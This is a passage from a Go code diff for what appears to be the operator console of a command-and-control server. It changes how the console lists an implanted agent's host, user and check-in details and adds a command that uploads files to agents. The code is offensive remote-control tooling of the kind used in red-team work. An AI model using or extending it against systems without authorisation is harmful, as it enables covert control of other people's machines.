len(cmd) == 2 { + color.Red("[!]Invalid command") + color.White("agent info ") + } else if len(cmd) >= 3 { + a, _ := uuid.FromString(cmd[2]) + table := tablewriter.NewWriter(os.Stdout) + table.SetAlignment(tablewriter.ALIGN_LEFT) + data := [][]string{ + {"ID", agents[a].id.String()}, + {"Platform", agents[a].platform}, + {"Architecture", agents[a].architecture}, + {"UserName", agents[a].userName}, + {"User GUID", agents[a].userGUID}, + {"Hostname", agents[a].hostName}, + {"Process ID", strconv.Itoa(agents[a].pid)}, + {"Initial Check In", agents[a].iCheckIn.String()}, + {"Last Check In", agents[a].sCheckIn.String()}, + {"Agent Version", agents[a].version}, + {"Agent Build", agents[a].build}, + {"Agent Wait Time", agents[a].waitTime}, + {"Agent Message Padding Max", strconv.Itoa(agents[a].paddingMax)}, + {"Agent Max Retries", strconv.Itoa(agents[a].maxRetry)}, + {"Agent Failed Logins", strconv.Itoa(agents[a].failedCheckin)}, + } + table.AppendBulk(data) + fmt.Println() + table.Render() + fmt.Println() } - } else { - color.Red("[!]Invalid command") - color.White("agent cmd ") - } - case "kill": - if len(cmd) == 3 { - addChannel(cmd) - } else { - color.Red("[!]Invalid command") - color.White("agent kill ") - } - case "control": - switch cmd[3] { - case "kill": - addChannel(cmd) - case "sleep": + case "upload": if len(cmd) == 5 { - _, err := time.ParseDuration(cmd[4]) - if err != nil { - color.Red("[!]There was an error setting the agent sleep time") - color.Red(err.Error()) - } else { + _, err := os.Stat(cmd[3]) + if err == nil { addChannel(cmd) + if debug { + color.Red("[DEBUG] Uploading: %s", strings.Join(cmd[3:], " ")) + } + } else { + color.Red("[!] Local file : %s does not exist", cmd[3]) } } else { - color.Red("[!]Invalid command") - color.White("agent control sleep